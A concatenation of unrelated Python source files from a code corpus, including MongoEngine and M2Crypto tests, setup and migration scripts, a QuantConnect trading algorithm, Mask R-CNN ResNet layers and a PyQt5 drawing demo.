ModelWithEnum().save() assert m.status is None assert ModelWithEnum.objects()[0].status is None assert ModelWithEnum.objects(status=None).count() == 1 def test_set_none_explicitly(self): ModelWithEnum.drop_collection() ModelWithEnum(status=None).save() assert ModelWithEnum.objects.first().status is None def test_cannot_create_model_with_wrong_enum_value(self): m = ModelWithEnum(status="wrong_one") with pytest.raises(ValidationError): m.validate() def test_user_is_informed_when_tries_to_set_choices(self): with pytest.raises(ValueError, match="'choices' can't be set on EnumField"): EnumField(Status, choices=["my", "custom", "options"]) class Color(Enum): RED = 1 BLUE = 2 class ModelWithColor(Document): color = EnumField(Color, default=Color.RED) class TestIntEnumField(MongoDBTestCase): def test_enum_with_int(self): ModelWithColor.drop_collection() m = ModelWithColor().save() assert m.color == Color.RED assert ModelWithColor.objects(color=Color.RED).count() == 1 assert ModelWithColor.objects(color=1).count() == 1 assert ModelWithColor.objects(color=2).count() == 0 def test_create_int_enum_by_value(self): model = ModelWithColor(color=2).save() assert model.color == Color.BLUE def test_storage_enum_with_int(self): model = ModelWithColor(color=Color.BLUE).save() assert get_as_pymongo(model) == {"_id": model.id, "color": 2} def test_validate_model(self): with pytest.raises(ValidationError, match="Value must be one of"): ModelWithColor(color=3).validate() with pytest.raises(ValidationError, match="Value must be one of"): ModelWithColor(color="wrong_type").validate() class TestFunkyEnumField(MongoDBTestCase): def test_enum_incompatible_bson_type_fails_during_save(self): class FunkyColor(Enum): YELLOW = object() class ModelWithFunkyColor(Document): color = EnumField(FunkyColor) m = ModelWithFunkyColor(color=FunkyColor.YELLOW) with pytest.raises(InvalidDocument, match="[cC]annot encode object"): m.save()
py
7dfd029798ead2ca7b72aa0fd7e7872a5e275338
#!/usr/bin/env python # -*- coding: utf-8 -*- from setuptools import setup # To use a consistent encoding from codecs import open from os import path here = path.abspath(path.dirname(__file__)) # read version string with open(path.join(here, "video_fft", "__init__.py")) as version_file: version = eval(version_file.read().split(" = ")[1].strip()) # Get the long description from the README file with open(path.join(here, "README.md"), encoding="utf-8") as f: long_description = f.read() # Get the history from the CHANGELOG file with open(path.join(here, "CHANGELOG.md"), encoding="utf-8") as f: history = f.read() setup( name="video_fft", version=version, description="Calculate the magnitude spectrum of a video sequence, via Fast Fourier Transform", long_description=long_description + "\n\n" + history, long_description_content_type="text/markdown", author="Werner Robitza", author_email="[email protected]", url="https://github.com/slhck/video-fft", packages=["video_fft"], include_package_data=True, install_requires=[ "av>=8.0.3", "tqdm>=4.60.0", "numpy>=1.20.2", "matplotlib>=3.4.2", ], license="MIT", zip_safe=False, keywords="ffmpeg, video", classifiers=[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "Topic :: Multimedia :: Video", "License :: OSI Approved :: MIT License", "Natural Language :: English", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.6", "Programming Language :: Python :: 3.7", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", ], python_requires=">=3.6", entry_points={"console_scripts": ["video-fft = video_fft.__main__:main"]}, )
py
7dfd029b4918d4dbc03e1e04254750f965a220d8
#!/usr/bin/env python import configparser from asnake.aspace import ASpace config = configparser.ConfigParser() config.read("local_settings.cfg") aspace = ASpace( baseurl=config.get("ArchivesSpace", "baseURL"), username=config.get("ArchivesSpace", "user"), password=config.get("ArchivesSpace", "password"), ) repo = aspace.repositories(2) output_file = "output_filename.tsv" resource_id = 12345 def is_year(date, x, y): ''' date (str): string to check for a 4 digit year x (int): starting index value y (int): ending index value ''' if date[x:y].isdigit() and int( date[x:y]) >= 1800 and int(date[x:y]) <= 2010: return True else: return False def find_year(date): '''takes a string, and finds a 4 digit string matching years likely in our collections, working backwards from end of string; checks last four characters before looping''' if len(date) >= 4: if is_year(date, -4, None): return date[-4:] else: x = -5 y = -1 for r in range(len(date)): if is_year(date, x, y): return date[x:y] break else: x += -1 y += -1 def get_end_date(ao, default_date): # uses either structured date or date expression to get end year if ao.get("dates"): # check for structured date field, return date as YYYY-YYYY if ao.get("dates")[0].get("begin"): return find_year( ao.get("dates")[0].get( "end", ao.get("dates")[0].get( "begin", ""))) else: if len(ao.get("dates")[0].get("expression")) == 4: return ao.get("dates")[0].get("expression") else: return find_year(ao.get("dates")[0].get("expression")) else: return default_date # create empty list to append uris to list_of_uris = [] for record in repo.resources(resource_id).tree.walk: # traverse tree of resource record, use level to skip series if record.level == "file": list_of_uris.append(record.uri) f = open(output_file, "a") for uri in list_of_uris: obj = aspace.client.get(uri, params={"resolve": ["top_container"]}) item_json = obj.json() if item_json.get("instances"): for i in item_json.get("instances"): if i.get("instance_type") != "digital_object": subcontainer = i.get('sub_container') if subcontainer.get("type_2") == "folder": folder_number = "{} {}".format(subcontainer.get( 'type_2'), subcontainer.get('indicator_2')) top_container = subcontainer.get( "top_container").get("_resolved") if top_container.get("type") == "box": f.write( "{}\t{} {}, {}\t{}\t{}\n".format( item_json.get("title"), top_container.get("type").capitalize(), top_container.get("indicator"), folder_number, get_end_date(item_json, "1940"), item_json.get("ref_id"))) f.close()
py
7dfd04404796e1fd5ae7584c63884183e8de6679
#!/usr/bin/env python """Unit tests for M2Crypto.EC, ECDSA part. Copyright (c) 2000 Ng Pheng Siong. All rights reserved. Portions copyright (c) 2005-2006 Vrije Universiteit Amsterdam. All rights reserved. """ import hashlib import logging from M2Crypto import EC, Rand from . import unittest from tests.test_ec_curves import tested_curve log = logging.getLogger(__name__) class ECDSATestCase(unittest.TestCase): errkey = 'tests/rsa.priv.pem' privkey = 'tests/ec.priv.pem' pubkey = 'tests/ec.pub.pem' data = hashlib.sha1(b'Can you spell subliminal channel?').digest() def callback(self, *args): pass def callback2(self): pass def test_loadkey_junk(self): with self.assertRaises(ValueError): EC.load_key(self.errkey) def test_loadkey(self): ec = EC.load_key(self.privkey) self.assertEqual(len(ec), tested_curve[1]) def test_loadpubkey(self): # XXX more work needed ec = EC.load_pub_key(self.pubkey) self.assertEqual(len(ec), tested_curve[1]) with self.assertRaises(EC.ECError): EC.load_pub_key(self.errkey) def _test_sign_dsa(self): ec = EC.gen_params(tested_curve[0]) # ec.gen_key() with self.assertRaises(EC.ECError): ec.sign_dsa(self.data) ec = EC.load_key(self.privkey) r, s = ec.sign_dsa(self.data) assert ec.verify_dsa(self.data, r, s) assert not ec.verify_dsa(self.data, s, r) def test_sign_dsa_asn1(self): ec = EC.load_key(self.privkey) blob = ec.sign_dsa_asn1(self.data) assert ec.verify_dsa_asn1(self.data, blob) with self.assertRaises(EC.ECError): ec.verify_dsa_asn1(blob, self.data) def test_verify_dsa(self): ec = EC.load_key(self.privkey) r, s = ec.sign_dsa(self.data) ec2 = EC.load_pub_key(self.pubkey) assert ec2.verify_dsa(self.data, r, s) assert not ec2.verify_dsa(self.data, s, r) def test_genparam(self): ec = EC.gen_params(tested_curve[0]) self.assertEqual(len(ec), tested_curve[1]) def test_pub_key_from_params(self): curve = EC.NID_prime256v1 ec = EC.gen_params(curve) ec.gen_key() ec_pub = ec.pub() k = ec_pub.get_key() ec2 = EC.pub_key_from_params(curve, k) assert ec2.check_key() r, s = ec.sign_dsa(self.data) assert ec2.verify_dsa(self.data, r, s) def suite(): return unittest.TestLoader().loadTestsFromTestCase(ECDSATestCase) if __name__ == '__main__': Rand.load_file('randpool.dat', -1) unittest.TextTestRunner().run(suite()) Rand.save_file('randpool.dat')
py
7dfd04420e46026d3e837bedc87a3c6cebec92b2
import os from pathlib import Path, PurePath import yaml from ..base import Base from .atomic import Atomic from ..utils.exceptions import AtomicsFolderNotFound class Loader(Base): __techniques = {} TECHNIQUE_DIRECTORY_PATTERN = 'T*' def __get_file_name(self, path) -> str: return path.name.rstrip('.yaml') def find_atomics(self, atomics_path, pattern='**/T*/T*.yaml') -> list: """Attempts to find the atomics folder within the provided atomics_path Args: atomics_path (str): A path to the atomic-red-team directory pattern (str, optional): Pattern used to find atomics and their required yaml files. Defaults to '**/T*/T*.yaml'. Returns: list: A list of paths of all identified atomics found in the given directory """ result = [] path = PurePath(atomics_path) for p in Path(path).rglob(pattern): result.append(p.resolve()) return result def load_technique(self, path_to_dir) -> dict: """Loads a provided yaml file which is typically an Atomic defintiion or configuration file. Args: path_to_dir (str): A string path to a yaml formatted file Returns: dict: Returns the loaded yaml file in a dictionary format """ try: with open(self.get_abs_path(path_to_dir), 'r', encoding="utf-8") as f: return yaml.safe_load(f.read()) except: # windows does not like get_abs_path so casting to string with open(str(path_to_dir), 'r', encoding="utf-8") as f: return yaml.safe_load(f.read()) def load_techniques(self) -> dict: """The main entrypoint when loading techniques from disk. Raises: AtomicsFolderNotFound: Thrown when unable to find the folder containing Atomic tests Returns: dict: A dict with the key(s) as the Atomic technique ID and the val is a list of Atomic objects. """ atomics_path = Base.CONFIG.atomics_path if not os.path.exists(self.get_abs_path(atomics_path)): atomics_path = self.find_atomics(self.get_abs_path(__file__)) if not atomics_path: raise AtomicsFolderNotFound('Unable to find any atomics folder') else: atomics_path = self.find_atomics(atomics_path) if not atomics_path: raise AtomicsFolderNotFound('Unable to find any atomics folder') for atomic_entry in atomics_path: technique = self.__get_file_name(atomic_entry) if not self.__techniques.get(technique): loaded_technique = self.load_technique(str(atomic_entry)) loaded_technique.update({'path': os.path.dirname(str(atomic_entry))}) self.__techniques[technique] = Atomic(**loaded_technique) return self.__techniques
py
7dfd052e7fe549f9a1139a6b479563a5dee56ead
from django.contrib import admin from .models import Table class TableAdmin(admin.ModelAdmin): list_display = ("name", "price", "url",) admin.site.register(Table, TableAdmin)
py
7dfd05614ce9702feb349ad4f932b89790d7d03c
# Copyright (c) 2016-2021 The Regents of the University of Michigan # Part of fresnel, released under the BSD 3-Clause License. """Test the Scene class.""" import fresnel import numpy from collections import namedtuple import PIL import conftest import os import pathlib dir_path = pathlib.Path(os.path.realpath(__file__)).parent def test_background_color(device_): """Test the background_color property.""" scene = fresnel.Scene(device=device_) scene.background_color = fresnel.color.linear((0.125, 0.75, 0.375)) numpy.testing.assert_array_equal(scene.background_color, fresnel.color.linear((0.125, 0.75, 0.375))) scene.background_alpha = 0.5 assert scene.background_alpha == 0.5 scene.camera = fresnel.camera.Orthographic(position=(0, 0, 10), look_at=(0, 0, 0), up=(0, 1, 0), height=7) buf_proxy = fresnel.preview(scene, w=100, h=100, anti_alias=False) buf = buf_proxy[:] numpy.testing.assert_array_equal( buf[:, :, 3], numpy.ones(shape=(100, 100), dtype=buf.dtype) * 128) numpy.testing.assert_array_equal( buf[:, :, 0:3], numpy.ones(shape=(100, 100, 3), dtype=buf.dtype) * (32, 191, 96)) def test_camera(scene_hex_sphere_, generate=False): """Test the camera property.""" scene_hex_sphere_.camera = fresnel.camera.Orthographic(position=(1, 0, 10), look_at=(1, 0, 0), up=(0, 1, 0), height=6) numpy.testing.assert_array_equal(scene_hex_sphere_.camera.position, (1, 0, 10)) numpy.testing.assert_array_equal(scene_hex_sphere_.camera.look_at, (1, 0, 0)) numpy.testing.assert_array_equal(scene_hex_sphere_.camera.up, (0, 1, 0)) assert scene_hex_sphere_.camera.height == 6 buf_proxy = fresnel.preview(scene_hex_sphere_, w=100, h=100, anti_alias=False) if generate: PIL.Image.fromarray(buf_proxy[:], mode='RGBA').save( open('output/test_scene.test_camera.png', 'wb'), 'png') else: conftest.assert_image_approx_equal( buf_proxy[:], dir_path / 'reference' / 'test_scene.test_camera.png') def test_light_dir(scene_hex_sphere_, generate=False): """Test the lights property.""" scene_hex_sphere_.lights[0].direction = (1, 0, 0) scene_hex_sphere_.lights[0].color = (0.5, 0.5, 0.5) assert scene_hex_sphere_.lights[0].direction == (1, 0, 0) assert scene_hex_sphere_.lights[0].color == (0.5, 0.5, 0.5) buf_proxy = fresnel.preview(scene_hex_sphere_, w=100, h=100, anti_alias=False) if generate: PIL.Image.fromarray(buf_proxy[:], mode='RGBA').save( open('output/test_scene.test_light_dir.png', 'wb'), 'png') else: conftest.assert_image_approx_equal( buf_proxy[:], dir_path / 'reference' / 'test_scene.test_light_dir.png') def test_multiple_geometries(device_, generate=False): """Test multiple geometries.""" scene = fresnel.Scene(lights=conftest.test_lights()) scene.camera = fresnel.camera.Orthographic(position=(0, 0, 10), look_at=(0, 0, 0), up=(0, 1, 0), height=7) geom1 = fresnel.geometry.Sphere(scene, position=[[-4, 1, 0], [-4, -1, 0], [-2, 1, 0], [-2, -1, 0]], radius=1.0) geom1.material = fresnel.material.Material(solid=1.0, color=fresnel.color.linear( [0.42, 0.267, 1])) geom1.outline_width = 0.12 geom2 = fresnel.geometry.Sphere(scene, position=[[4, 1, 0], [4, -1, 0], [2, 1, 0], [2, -1, 0]], radius=1.0) geom2.material = fresnel.material.Material(solid=0.0, color=fresnel.color.linear( [1, 0.874, 0.169])) buf_proxy = fresnel.preview(scene, w=200, h=100, anti_alias=False) if generate: PIL.Image.fromarray(buf_proxy[:], mode='RGBA').save( open('output/test_scene.test_multiple_geometries1.png', 'wb'), 'png') else: conftest.assert_image_approx_equal( buf_proxy[:], dir_path / 'reference' / 'test_scene.test_multiple_geometries1.png') geom1.disable() buf_proxy = fresnel.preview(scene, w=200, h=100, anti_alias=False) if generate: PIL.Image.fromarray(buf_proxy[:], mode='RGBA').save( open('output/test_scene.test_multiple_geometries2.png', 'wb'), 'png') else: conftest.assert_image_approx_equal( buf_proxy[:], dir_path / 'reference' / 'test_scene.test_multiple_geometries2.png') geom1.enable() buf_proxy = fresnel.preview(scene, w=200, h=100, anti_alias=False) if generate: PIL.Image.fromarray(buf_proxy[:], mode='RGBA').save( open('output/test_scene.test_multiple_geometries3.png', 'wb'), 'png') else: conftest.assert_image_approx_equal( buf_proxy[:], dir_path / 'reference' / 'test_scene.test_multiple_geometries3.png') geom2.remove() buf_proxy = fresnel.preview(scene, w=200, h=100, anti_alias=False) if generate: PIL.Image.fromarray(buf_proxy[:], mode='RGBA').save( open('output/test_scene.test_multiple_geometries4.png', 'wb'), 'png') else: conftest.assert_image_approx_equal( buf_proxy[:], dir_path / 'reference' / 'test_scene.test_multiple_geometries4.png') if __name__ == '__main__': struct = namedtuple("struct", "param") device = conftest.device(struct(('cpu', None))) scene = conftest.scene_hex_sphere(device) test_camera(scene, generate=True) scene = conftest.scene_hex_sphere(device) test_light_dir(scene, generate=True) scene = conftest.scene_hex_sphere(device) test_multiple_geometries(scene, generate=True)
py
7dfd0607f253f5b65eaa88b5d2c0988711c23a0a
import urllib.request as ur import urllib """ 2017 - 4 - 10 neko34 从网络中获取对应的数据,调用对应的API """ def openUrl(urlString): html = ur.urlopen(urlString).read() return html
py
7dfd06c6f7c0121185935619390d90deea4527f1
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.conf import settings from django.db import models, migrations def create_profiles(apps, schema_editor): """ Make sure that any already-created users have profiles, as the profile creation signal handler will never be triggered for already-existing users. """ User = apps.get_model(settings.AUTH_USER_MODEL) UserProfile = apps.get_model('users', 'UserProfile') for user in User.objects.all(): profile = UserProfile() profile.user = user profile.terms_of_use = False # Default value, but we're being explicit profile.save() class Migration(migrations.Migration): dependencies = [ ('users', '0009_userprofile'), ] operations = [ migrations.RunPython(create_profiles) ]
py
7dfd071e899187f1c780a867f77d355783f1ea78
#!/usr/bin/env python import src.network as network from . import args class NeuralNet: def __init__(self): self.args = args def run(self): network.startNetwork(self)
py
7dfd07a9d0f7d7b0295b2177418e2123657298a5
# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals. # Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from clr import AddReference AddReference("System") AddReference("QuantConnect.Algorithm") AddReference("QuantConnect.Common") from System import * from QuantConnect import * from QuantConnect.Algorithm import * from QuantConnect.Data import SubscriptionDataSource from QuantConnect.Python import PythonData from datetime import date, timedelta, datetime import decimal import numpy as np import json class CustomDataBitcoinAlgorithm(QCAlgorithm): '''3.0 CUSTOM DATA SOURCE: USE YOUR OWN MARKET DATA (OPTIONS, FOREX, FUTURES, DERIVATIVES etc). The new QuantConnect Lean Backtesting Engine is incredibly flexible and allows you to define your own data source. This includes any data source which has a TIME and VALUE. These are the *only* requirements. To demonstrate this we're loading in "Bitcoin" data.''' def Initialize(self): self.SetStartDate(2011, 9, 13) self.SetEndDate(datetime.now().date() - timedelta(1)) self.SetCash(100000) # Define the symbol and "type" of our generic data: self.AddData(Bitcoin, "BTC") def OnData(self, data): if "BTC" not in data: return close = data["BTC"].Close # If we don't have any weather "SHARES" -- invest" if not self.Portfolio.Invested: # Weather used as a tradable asset, like stocks, futures etc. self.SetHoldings("BTC", 1) self.Debug("Buying BTC 'Shares': BTC: {0}".format(close)) self.Debug("Time: {0} {1}".format(datetime.now(), close)) class Bitcoin(PythonData): '''Custom Data Type: Bitcoin data from Quandl - http://www.quandl.com/help/api-for-bitcoin-data''' def GetSource(self, config, date, isLiveMode): if isLiveMode: return SubscriptionDataSource("https://www.bitstamp.net/api/ticker/", SubscriptionTransportMedium.Rest); #return "http://my-ftp-server.com/futures-data-" + date.ToString("Ymd") + ".zip"; # OR simply return a fixed small data file. Large files will slow down your backtest return SubscriptionDataSource("http://www.quandl.com/api/v1/datasets/BCHARTS/BITSTAMPUSD.csv?sort_order=asc", SubscriptionTransportMedium.RemoteFile); def Reader(self, config, line, date, isLiveMode): coin = Bitcoin() coin.Symbol = config.Symbol if isLiveMode: # Example Line Format: # {"high": "441.00", "last": "421.86", "timestamp": "1411606877", "bid": "421.96", "vwap": "428.58", "volume": "14120.40683975", "low": "418.83", "ask": "421.99"} try: liveBTC = json.loads(line) # If value is zero, return None value = decimal.Decimal(liveBTC["last"]) if value == 0: return None coin.Time = datetime.now() coin.Value = value coin["Open"] = float(liveBTC["open"]) coin["High"] = float(liveBTC["high"]) coin["Low"] = float(liveBTC["low"]) coin["Close"] = float(liveBTC["last"]) coin["Ask"] = float(liveBTC["ask"]) coin["Bid"] = float(liveBTC["bid"]) coin["VolumeBTC"] = float(liveBTC["volume"]) coin["WeightedPrice"] = float(liveBTC["vwap"]) return coin except ValueError: # Do nothing, possible error in json decoding return None # Example Line Format: # Date Open High Low Close Volume (BTC) Volume (Currency) Weighted Price # 2011-09-13 5.8 6.0 5.65 5.97 58.37138238, 346.0973893944 5.929230648356 if not (line.strip() and line[0].isdigit()): return None try: data = line.split(',') # If value is zero, return None value = decimal.Decimal(data[4]) if value == 0: return None coin.Time = datetime.strptime(data[0], "%Y-%m-%d") coin.Value = value coin["Open"] = float(data[1]) coin["High"] = float(data[2]) coin["Low"] = float(data[3]) coin["Close"] = float(data[4]) coin["VolumeBTC"] = float(data[5]) coin["VolumeUSD"] = float(data[6]) coin["WeightedPrice"] = float(data[7]) return coin; except ValueError: # Do nothing, possible error in json decoding return None
py
7dfd090d19390cc3887ebbc41e1544317820758d
import numpy as np from vecdb import VecDB from flask import Flask, request, json, jsonify from flask_sqlalchemy import SQLAlchemy from sklearn.metrics.pairwise import cosine_similarity from datetime import datetime app = Flask(__name__) # Database app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db.sqlite3' db = SQLAlchemy(app) vdb = VecDB(filepath='data.h5', emb_dim=512) # Face Model class Face(db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(50)) embedding_key = db.Column(db.Integer) created_at = db.Column(db.DateTime, default=datetime.now) # Fake ML model def model(): return np.random.randn(512) # Routes @app.route('/store', methods=['POST']) def store(): name = request.form.get('name') pred = model() emb_key = vdb.store(pred) face = Face(name=name, embedding_key=emb_key) db.session.add(face) db.session.commit() return jsonify({ "status": "ok", "msg": "New face added" }) @app.route('/most_similar', methods=['POST']) def most_similar(): emb = model() key = vdb.most(emb, func=cosine_similarity) face = Face.query.filter_by(embedding_key=int(key)).first() if face is not None: return jsonify({ "name": face.name }) return jsonify({ "status": "error", "msg": "Could not compare faces" }) if __name__ == '__main__': app.run()
py
7dfd0992d02804b22aa46d895bb8da4e39a4dd73
""" Simple script that checks if a checkpoint is corrupted with any inf/NaN values. Run like this: python inspect_checkpoint.py model.12345 """ import tensorflow as tf import sys import numpy as np if __name__ == '__main__': if len(sys.argv) != 2: raise Exception("Usage: python inspect_checkpoint.py <file_name>\nNote: Do not include the .data .index or .meta part of the model checkpoint in file_name.") file_name = sys.argv[1] reader = tf.train.NewCheckpointReader(file_name) var_to_shape_map = reader.get_variable_to_shape_map() finite = [] all_infnan = [] some_infnan = [] for key in sorted(var_to_shape_map.keys()): tensor = reader.get_tensor(key) print ("key: ", key) print (tensor.shape) if np.all(np.isfinite(tensor)): finite.append(key) else: if not np.any(np.isfinite(tensor)): all_infnan.append(key) else: some_infnan.append(key) print ("\nFINITE VARIABLES:") for key in finite: print (key) print ("\n") print ("finite: ", finite) print ("\nVARIABLES THAT ARE ALL INF/NAN:") for key in all_infnan: print (key) print ("\nVARIABLES THAT CONTAIN SOME FINITE, SOME INF/NAN VALUES:") for key in some_infnan: print (key) print ("") if not all_infnan and not some_infnan: print ("CHECK PASSED: checkpoint contains no inf/NaN values") else: print ("CHECK FAILED: checkpoint contains some inf/NaN values")
py
7dfd0c41f7e10fa822b2beefcd4bb6913acaa8e0
# -*- coding: utf-8 -*- import sys from app.wechat import wechat if sys.version_info.major != 3: exit('Please run under Python3') if __name__ == '__main__': obj = wechat() obj.run()
py
7dfd0f65393c61f4802f1d99dec8712b4767e518
# AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT from __future__ import unicode_literals from ..legacy import antsIntroduction def test_antsIntroduction_inputs(): input_map = dict(args=dict(argstr='%s', ), bias_field_correction=dict(argstr='-n 1', ), dimension=dict(argstr='-d %d', position=1, usedefault=True, ), environ=dict(nohash=True, usedefault=True, ), force_proceed=dict(argstr='-f 1', ), ignore_exception=dict(deprecated='1.0.0', nohash=True, usedefault=True, ), input_image=dict(argstr='-i %s', copyfile=False, mandatory=True, ), inverse_warp_template_labels=dict(argstr='-l', ), max_iterations=dict(argstr='-m %s', sep='x', ), num_threads=dict(nohash=True, usedefault=True, ), out_prefix=dict(argstr='-o %s', usedefault=True, ), quality_check=dict(argstr='-q 1', ), reference_image=dict(argstr='-r %s', copyfile=True, mandatory=True, ), similarity_metric=dict(argstr='-s %s', ), terminal_output=dict(deprecated='1.0.0', nohash=True, ), transformation_model=dict(argstr='-t %s', usedefault=True, ), ) inputs = antsIntroduction.input_spec() for key, metadata in list(input_map.items()): for metakey, value in list(metadata.items()): assert getattr(inputs.traits()[key], metakey) == value def test_antsIntroduction_outputs(): output_map = dict(affine_transformation=dict(), input_file=dict(), inverse_warp_field=dict(), output_file=dict(), warp_field=dict(), ) outputs = antsIntroduction.output_spec() for key, metadata in list(output_map.items()): for metakey, value in list(metadata.items()): assert getattr(outputs.traits()[key], metakey) == value
py
7dfd101f7c659900c0fd39f39be906b9459c09d7
L=[3,5] L[0:0]= [1,2] L[3:3]= [4] L[len(L):len(L)]=[6] print(L) L[:]=L[::-1] print(L)
py
7dfd116a1deb520477b0290436d1d36fd4e5a3dd
import math import numpy as np import tensorflow.keras.layers as KL from mrcnn.layers import BatchNorm ############################################################ # Resnet Graph ############################################################ # Code adopted from: # https://github.com/fchollet/deep-learning-models/blob/master/resnet50.py def identity_block(input_tensor, kernel_size, filters, stage, block, use_bias=True, train_bn=True): """The identity_block is the block that has no conv layer at shortcut # Arguments input_tensor: input tensor kernel_size: default 3, the kernel size of middle conv layer at main path filters: list of integers, the nb_filters of 3 conv layer at main path stage: integer, current stage label, used for generating layer names block: 'a','b'..., current block label, used for generating layer names use_bias: Boolean. To use or not use a bias in conv layers. train_bn: Boolean. Train or freeze Batch Norm layers """ nb_filter1, nb_filter2, nb_filter3 = filters conv_name_base = 'res' + str(stage) + block + '_branch' bn_name_base = 'bn' + str(stage) + block + '_branch' x = KL.Conv2D(nb_filter1, (1, 1), name=conv_name_base + '2a', use_bias=use_bias)(input_tensor) x = BatchNorm(name=bn_name_base + '2a')(x, training=train_bn) x = KL.Activation('relu')(x) x = KL.Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same', name=conv_name_base + '2b', use_bias=use_bias)(x) x = BatchNorm(name=bn_name_base + '2b')(x, training=train_bn) x = KL.Activation('relu')(x) x = KL.Conv2D(nb_filter3, (1, 1), name=conv_name_base + '2c', use_bias=use_bias)(x) x = BatchNorm(name=bn_name_base + '2c')(x, training=train_bn) x = KL.Add()([x, input_tensor]) x = KL.Activation('relu', name='res' + str(stage) + block + '_out')(x) return x def conv_block(input_tensor, kernel_size, filters, stage, block, strides=(2, 2), use_bias=True, train_bn=True): """conv_block is the block that has a conv layer at shortcut # Arguments input_tensor: input tensor kernel_size: default 3, the kernel size of middle conv layer at main path filters: list of integers, the nb_filters of 3 conv layer at main path stage: integer, current stage label, used for generating layer names block: 'a','b'..., current block label, used for generating layer names use_bias: Boolean. To use or not use a bias in conv layers. train_bn: Boolean. Train or freeze Batch Norm layers Note that from stage 3, the first conv layer at main path is with subsample=(2,2) And the shortcut should have subsample=(2,2) as well """ nb_filter1, nb_filter2, nb_filter3 = filters conv_name_base = 'res' + str(stage) + block + '_branch' bn_name_base = 'bn' + str(stage) + block + '_branch' x = KL.Conv2D(nb_filter1, (1, 1), strides=strides, name=conv_name_base + '2a', use_bias=use_bias)(input_tensor) x = BatchNorm(name=bn_name_base + '2a')(x, training=train_bn) x = KL.Activation('relu')(x) x = KL.Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same', name=conv_name_base + '2b', use_bias=use_bias)(x) x = BatchNorm(name=bn_name_base + '2b')(x, training=train_bn) x = KL.Activation('relu')(x) x = KL.Conv2D(nb_filter3, (1, 1), name=conv_name_base + '2c', use_bias=use_bias)(x) x = BatchNorm(name=bn_name_base + '2c')(x, training=train_bn) shortcut = KL.Conv2D(nb_filter3, (1, 1), strides=strides, name=conv_name_base + '1', use_bias=use_bias)(input_tensor) shortcut = BatchNorm(name=bn_name_base + '1')(shortcut, training=train_bn) x = KL.Add()([x, shortcut]) x = KL.Activation('relu', name='res' + str(stage) + block + '_out')(x) return x def resnet_graph(input_image, architecture, stage5=False, train_bn=True): """Build a ResNet graph. architecture: Can be resnet50 or resnet101 stage5: Boolean. If False, stage5 of the network is not created train_bn: Boolean. Train or freeze Batch Norm layers """ assert architecture in ["resnet50", "resnet101"] # Stage 1 x = KL.ZeroPadding2D((3, 3))(input_image) x = KL.Conv2D(64, (7, 7), strides=(2, 2), name='conv1', use_bias=True)(x) x = BatchNorm(name='bn_conv1')(x, training=train_bn) x = KL.Activation('relu')(x) C1 = x = KL.MaxPooling2D((3, 3), strides=(2, 2), padding="same")(x) # Stage 2 x = conv_block(x, 3, [64, 64, 256], stage=2, block='a', strides=(1, 1), train_bn=train_bn) x = identity_block(x, 3, [64, 64, 256], stage=2, block='b', train_bn=train_bn) C2 = x = identity_block(x, 3, [64, 64, 256], stage=2, block='c', train_bn=train_bn) # Stage 3 x = conv_block(x, 3, [128, 128, 512], stage=3, block='a', train_bn=train_bn) x = identity_block(x, 3, [128, 128, 512], stage=3, block='b', train_bn=train_bn) x = identity_block(x, 3, [128, 128, 512], stage=3, block='c', train_bn=train_bn) C3 = x = identity_block(x, 3, [128, 128, 512], stage=3, block='d', train_bn=train_bn) # Stage 4 x = conv_block(x, 3, [256, 256, 1024], stage=4, block='a', train_bn=train_bn) block_count = {"resnet50": 5, "resnet101": 22}[architecture] for i in range(block_count): x = identity_block(x, 3, [256, 256, 1024], stage=4, block=chr(98 + i), train_bn=train_bn) C4 = x # Stage 5 if stage5: x = conv_block(x, 3, [512, 512, 2048], stage=5, block='a', train_bn=train_bn) x = identity_block(x, 3, [512, 512, 2048], stage=5, block='b', train_bn=train_bn) C5 = x = identity_block(x, 3, [512, 512, 2048], stage=5, block='c', train_bn=train_bn) else: C5 = None return [C1, C2, C3, C4, C5]
py
7dfd11867046d429a132d73377bb2d01b0db4b32
"""Package with meta steps for tests of oneprovider using web GUI. """ __author__ = "Michal Stanisz" __copyright__ = "Copyright (C) 2017 ACK CYFRONET AGH" __license__ = "This software is released under the MIT license cited in " \ "LICENSE.txt"
py
7dfd11e941777f7b3219e2a16afeb190194c836e
# -*- coding: utf-8 -*- """ PyQt5 tutorial In this example we draw 6 lines using different pen styles. author: py40.com last edited: 2017年3月 """ import sys from PyQt5.QtWidgets import QWidget, QApplication from PyQt5.QtGui import QPainter, QColor, QPen from PyQt5.QtCore import Qt class Example(QWidget): def __init__(self): super().__init__() self.initUI() def initUI(self): self.setGeometry(300, 300, 280, 270) self.setWindowTitle('Pen styles') self.show() def paintEvent(self, e): qp = QPainter() qp.begin(self) self.drawLines(qp) qp.end() def drawLines(self, qp): pen = QPen(Qt.black, 2, Qt.SolidLine) qp.setPen(pen) qp.drawLine(20, 40, 250, 40) pen.setStyle(Qt.DashLine) qp.setPen(pen) qp.drawLine(20, 80, 250, 80) pen.setStyle(Qt.DashDotLine) qp.setPen(pen) qp.drawLine(20, 120, 250, 120) pen.setStyle(Qt.DotLine) qp.setPen(pen) qp.drawLine(20, 160, 250, 160) pen.setStyle(Qt.DashDotDotLine) qp.setPen(pen) qp.drawLine(20, 200, 250, 200) pen.setStyle(Qt.CustomDashLine) pen.setDashPattern([1, 4, 5, 4]) qp.setPen(pen) qp.drawLine(20, 240, 250, 240) if __name__ == '__main__': app = QApplication(sys.argv) ex = Example() sys.exit(app.exec_())
py
7dfd120a2408f689e35fa276a11d05bcb375fb71
